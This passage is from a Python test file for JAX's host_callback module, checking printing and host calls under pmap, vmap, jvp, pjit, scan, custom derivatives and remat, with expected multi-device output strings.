def fun(xv, do_print=False):
# This will be printed on all devices, with shape [1, 3]
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices, with shape [1, 3]
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = jax.pmap(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
def test_tap_jvp_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
shape = (nr_devices, 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return jax.jvp(jax.pmap(jax.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
(xv,), (.1 * jnp.ones_like(xv),))
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute jax.jvp(jax.vmap(...)) for matrix[0, :, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]] [[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]] [[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
def test_tap_vmap_pmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
shape = (2, nr_devices, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return jax.vmap(jax.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute jax.vmap(...) for matrix[:, 0, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
@ignore_jit_of_pmap_warning()
def test_tap_jit_pmap_extra(self):
"""jit of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
assert nr_devices in (1, 2)
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices with shape (nr_devices, 3)
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices with shape (nr_devices, 3)
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = jax.jit(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
if len(local_devices()) == 2:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
else:
assert len(local_devices()) == 1
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
def test_tap_cond_pmap(self):
raise SkipTest("cond of pmap does not work in JAX. Issue #5178.")
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, jax.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix, do_print=True)
self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_tap_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_tap_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
@partial(jax.named_call, name="fun1") # for xprof debugging
def fun1(x, do_print=False):
z = jnp.dot(x, y)
return maybe_print(do_print, z, "z", tap_with_device=True)
res0 = fun1(x, do_print=False)
pjit_fun1 = pjit.pjit(
partial(fun1, do_print=True),
in_axis_resources=(P("d"),),
out_axis_resources=P("d"))
with maps.mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun1,
x,
num_partitions=nr_devices)
res = pjit_fun1(x)
self.assertAllClose(res0, res)
hcb.barrier_wait("before check")
# Assertion text is for 2 devices (also works for 1 device)
# Note that a single call is made.
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: z
[[ 3 3 3 3]
[33 33 33 33]]""")
def test_tap_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_tap_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
def test_tap_mask(self):
@partial(jax.mask, in_shapes=['n'], out_shape='')
def padded_sum(x):
three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
output_stream=testing_stream)
return jnp.sum(three_x)
x = np.arange(5.)
self.assertAllClose(9., padded_sum([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
testing_stream.reset()
# With VMAP
xv = np.arange(10.).reshape((2, 5)) # logical_shape = 5
self.assertAllClose(
np.array([9., 78.]),
# batch_size = 2, n=3 and 4 for the two elements
jax.vmap(padded_sum)([xv],
dict(n=np.array([3., 4.]))))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] ) ( [3. 4.] ) ) )""", testing_stream.output)
testing_stream.reset()
# With JVP
self.assertAllClose((9., 0.9),
jax.jvp(lambda arg: padded_sum([arg], dict(n=3)),
(x,), (x * 0.1,)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4] [0. 0.2 0.4 0.6 0.8] ) ( ( False ) ( False ) ) ) )""",
testing_stream.output)
testing_stream.reset()
# Now with JIT
self.assertAllClose(9., jax.jit(padded_sum)([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
def test_tap_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_tap_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what=f"x times {i}", output_stream=testing_stream)
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait("first")
expected = """
what: x times 1
[[0. 1. 2.]
[3. 4. 5.]]
what: x times 2
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times 3
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait("second")
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_error_bad_consumer_id(self):
"""Try to use reserved consumer ID 0.
Check that we get the proper error from the runtime."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
with self.assertRaisesRegex(RuntimeError,
"Consumer ID cannot be a reserved value: 0"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 0,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_tap_error_different_shapes(self):
"""Try to register different shapes for the same consumer ID."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.int32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2,), dtype=np.float32))])
def test_tap_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_tap_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
jax.grad(loss)(1.0) # should not fail
def test_tap_remat_0(self):
def f(i, k):
x = hcb.id_print(k + i, output_stream=testing_stream)
return k * x
def loss(k):
return lax.fori_loop(0, 2, jax.remat(f), k)
print(loss(3))
hcb.barrier_wait()
expected = """
3
10"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_use_remat={use_remat}_{grad_func}_use_result={use_result}",
use_result=use_result, use_remat=use_remat, grad_func=grad_func)
for use_result in [True, False]
for grad_func in ["grad", "value_and_grad"]
for use_remat in [True, False]))
def test_tap_remat(self, use_result=False, grad_func="grad", use_remat=False):
def f(x):
id_print_result = hcb.id_print(x, output_stream=testing_stream)
if use_result:
x = id_print_result
return 3. * x
grad_f = jax.grad if grad_func == "grad" else jax.value_and_grad
trans_f = jax.remat(f) if use_remat else f
print(jax.make_jaxpr(grad_f(trans_f))(2.))
grad_f(trans_f)(2.)
hcb.barrier_wait()
if not use_result:
if use_remat:
expected = ""
else:
# TODO: if not use_result then we should only see the primal when
# computing value_and_grad.
expected = "2."
elif use_remat:
expected = """
2.
2.
transforms: ['jvp', 'transpose']
3."""
else:
expected = """
2.
transforms: ['jvp', 'transpose']
3."""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
def test_tap_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2))
self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
hcb.barrier_wait()
expected = """
what: step_nr
0
what: step_nr
1"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(x):
return 2 * x
def fun(x):
y = hcb.call(f_outside, x + 1, result_shape=x)
return 3 * (1 + y)
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(3 * (1 + 2 * (arg + 1)), fun(arg))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_{np.dtype(dtype).name}", dtype=dtype)
for dtype in jtu.dtypes.all
if dtype != np.bool_))
def test_call_types(self, dtype=np.float64):
def f_outside(x):
# Use x + x to ensure that the result type is the same
return x + x
def fun(x):
return hcb.call(f_outside, x + x, result_shape=x)
arg = np.arange(24, dtype=dtype).reshape((2, 3, 4))
self.assertAllClose(arg + arg + arg + arg, fun(arg), check_dtypes=True)
def test_call_types_bool(self, dtype=np.float64):
def f_outside(x):
return np.invert(x)
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
arg = np.random.choice(a=[True, False], size=(2, 3, 4))
self.assertAllClose(np.invert(arg), fun(arg))
def test_call_tuples(self):
def f_outside(args):
x, y = args
return y, x # Swap the tuple
def fun(x):
xy = hcb.call(f_outside, (x, x + 1), result_shape=(x, x))
return 2 * xy[0] + 3 * xy[1]
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(2 * (arg + 1) + 3 * arg, fun(arg))
def test_call_empty_arg(self):
"""Call with empty array."""
result = np.ones((2,), dtype=np.float32)
def f_outside(_):
return result
def fun(x):
return x + hcb.call(f_outside, (),
result_shape=jax.ShapeDtypeStruct(result.shape, result.dtype))
self.assertAllClose(2. + result, fun(2.))
def test_call_empty_result(self):
"""Call returning empty array."""
result_shape = (2, 0)
def f_outside(_):
return np.ones(result_shape, dtype=np.float32)
def fun(x):
return x + hcb.call(f_outside, 1.,
result_shape=jax.ShapeDtypeStruct(result_shape, np.float32))
self.assertAllClose(f_outside(0.), fun(2.))
def test_call_empty_result_inside_pytree(self):
"""Call returning a tuple with an empty array and a non-empty one."""
result_shape_0 = (2, 0)
result_shape_2 = (0,)
def f_outside(_):
return (np.ones(result_shape_0, dtype=np.float32),
np.ones((1,), dtype=np.float32),
np.ones(result_shape_2, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape_0, np.float32),
jax.ShapeDtypeStruct((1,), np.float32),
jax.ShapeDtypeStruct(result_shape_2, np.float32)))
self.assertEqual(result_shape_0, res[0].shape)
self.assertEqual(result_shape_2, res[2].shape)
return x + res[1]
self.assertAllClose(2 + np.ones((1,), dtype=np.float32), fun(2.))
def test_call_empty_result_all_pytree(self):
"""Call returning a tuple of empty arrays."""
result_shape = (2, 0)
def f_outside(_):
return (np.ones(result_shape, dtype=np.float32),
np.ones(result_shape, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape, np.float32),
jax.ShapeDtypeStruct(result_shape, np.float32)))
return x + res[0] + res[1]
self.assertAllClose(np.ones(result_shape, dtype=np.float32),
fun(2.))
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, jax.jit(loop)(1.2))
def test_call_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = jax.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_call_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=jax.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
def test_call_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function."""
def fun1(m):
return jnp.sin(hcb.call(lambda x: np.cos(x),
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun1, m)
def fun2(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun2, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(len(local_devices()), dtype=jnp.int32)
res = jax.pmap(fun)(xv)
self.assertAllClose(jax.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError,
"batching rules are implemented only for id_tap, not for call"):
jax.vmap(fun)(np.ones((2, 3)))
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_call_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_call_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
def callback_x5_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(5, np.int32)
def fun(x):
xy = jnp.dot(x, y)
return hcb.call(
callback_x5_func, xy, result_shape=xy, call_with_device=True)
pjit_fun = pjit.pjit(
fun, in_axis_resources=(P("d"),), out_axis_resources=P("d"))
with maps.mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun,
x,
num_partitions=nr_devices)
res = pjit_fun(x)
expected_res = jnp.dot(x, y) * np.array(5, np.int32)
self.assertAllClose(expected_res, res, check_dtypes=False)
hcb.barrier_wait("before assertion")
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0
Called with [[ 3 3 3 3]
[33 33 33 33]]""")
def test_call_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_call_error_callback_throws_exception(self):
def f_outside(x):
raise ValueError("user exception")
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"ValueError: user exception")
def test_call_error_callback_returns_unexpected_shape(self):
def fun(x):
return hcb.call(lambda x: (x, x), x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"Callback func .* should have returned a result with pytree")
def test_call_error_then_compute(self):
# Continue computation on device after error
def f_outside(x):
raise ValueError("user exception")
def fun(x):
x1 = hcb.call(f_outside, x, result_shape=x)
return x1
arg = np.arange(3, dtype=np.int32)
self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
"ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
"""Calls a JAX function on a specific device with simple support for reverse AD.
Functions whose name starts with "jax_outside" are called on another device,
by way of hcb.call.
"""
def run_jax_outside_fun(arg):
return jax.jit(jax_outside_fun)(jax.device_put(arg, device))
@jax.custom_vjp
def make_call(arg):
return hcb.call(run_jax_outside_fun, arg,
result_shape=jax.eval_shape(jax_outside_fun, arg))
# Define the fwd and bwd custom_vjp functions
def make_call_vjp_fwd(arg):
# Return the primal argument as the residual. Use `make_call` for the
# primal computation to enable higher-order AD.
return make_call(arg), arg # Return the primal argument as the residual
def make_call_vjp_bwd(res, ct_res):
arg = res # residual is the primal argument
def jax_outside_vjp_fun(arg_and_ct):
arg, ct = arg_and_ct
_, f_vjp = jax.vjp(jax_outside_fun, arg)
ct_in, = f_vjp(ct)
return ct_in
return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)
make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
return make_call(arg)
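# A minimal usage sketch for `call_jax_other_device` (illustrative only; assumes at
# least two visible devices, e.g. CPU with XLA_FLAGS=--xla_force_host_platform_device_count=2).
# The helper below is hypothetical and is not used by the tests that follow.
def _example_call_jax_other_device():
  other_device = jax.devices("cpu")[-1]
  # Primal value computed on `other_device` via hcb.call
  y = call_jax_other_device(jnp.sin, 3.0, device=other_device)
  # Reverse-mode AD still works, because make_call carries a custom_vjp
  dy = jax.grad(lambda x: 2. * call_jax_other_device(jnp.sin, x, device=other_device))(3.0)
  return y, dy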
class CallJaxTest(jtu.JaxTestCase):
"""Tests using `call_jax_other_device`."""
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
if jtu.device_under_test() != "cpu":
assert jax.devices("cpu")
self.outside_device = jax.devices("cpu")[0]
else:
if len(jax.devices("cpu")) == 1:
raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
self.outside_device = jax.devices("cpu")[1]
super().setUp()
def test_jax_impl(self):
def f_jax(x):
return jnp.sin(x)
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
self.assertAllClose(f_jax(3.), f_outside(3.))
self.assertAllClose(f_jax(3.), jax.jit(f_outside)(3.))
def test_jax_impl_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a list of two elements
return [jnp.sin(x["a"]), jnp.sin(x["b"])]
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = f_jax(x)
# print(f"outside_jaxpr = {jax.make_jaxpr(f_outside)(x)}")
res_outside = f_outside(x)
self.assertAllClose(res_jax, res_outside)
def test_jax_grad(self):
def f_jax(x):
return 2. * jnp.sin(x)
def f_outside(x):
return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)
res_jax = jax.grad(f_jax)(3.)
self.assertAllClose(res_jax, jax.grad(f_outside)(3.))
def test_jax_grad_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a float
return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = jax.grad(f_jax)(x)
self.assertAllClose(res_jax, jax.grad(f_outside)(x))
def test_jax_grad_of_grad(self):
def f_jax(x):
return 2. * x * x * x
def f_outside(x):
return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)
res_jax = jax.grad(jax.grad(f_jax))(5.)
res_outside = jax.grad(jax.grad(f_outside))(5.)
self.assertAllClose(res_jax, res_outside)
class OutfeedRewriterTest(jtu.JaxTestCase):
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
super().setUp()
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
has_input_token=True, has_output_token=True):
"""Check that the rewrite of func(*args) matches expected."""
jaxpr = jax.make_jaxpr(func)(*args)
rewritten = hcb._rewrite_closed_jaxpr(jaxpr, # noqa: F841
has_input_token, has_output_token)
# Since it is somewhat annoying to update the Jaxpr assertions when we change
